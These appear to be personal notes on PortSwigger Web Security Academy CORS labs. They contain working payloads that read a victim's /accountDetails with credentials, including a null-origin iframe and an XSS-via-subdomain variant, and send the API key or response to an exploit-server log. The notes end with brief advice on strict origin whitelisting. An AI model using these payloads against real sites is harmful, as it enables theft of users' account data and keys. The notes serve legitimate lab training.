/accountDetails endpoint response headers include Access-Control-Allow-Credentials: true/, which means CORS enabled. Visiting this endpoint successfully in a new tab can verify this.
<script>
fetch('https://0aff00e0032c129a802e174b0051007c.web-security-academy.net/accountDetails', {credentials:'include'})
.then(r => r.json())
.then(j => {
document.location = "https://exploit-0a4a007303e4120780a21602017e0088.exploit-server.net/log?key=" + j.apikey;
})
</script>iframe srcdoc can make Origin header to be null.
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://0ad7003d043537e880f1fee700bd0077.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='https://exploit-0a59000f046037f6807efd0c01f800f0.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
};
</script>">
</iframe>IMPORTANT: This lab needs you to enable third-party cookies.
This work for "View Exploit", but not geting administrator request after delievered.
<script>
document.location="http://stock.0a22009104211e5a80c844d600a3000c.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0a22009104211e5a80c844d600a3000c.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {document.location='https://exploit-0a2b0010040d1e598057439701bd0016.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>I think there something wrong with this lab. Even deliver this simple version to victim, there won't be this request logged.
<script>
document.location='https://exploit-0a2b0010040d1e598057439701bd0016.exploit-server.net/log?key=wuhao';
</script>- Carefully set
Access-Control-Allow-Origin, whitelist, nonull, no wildcards; - Server-side security.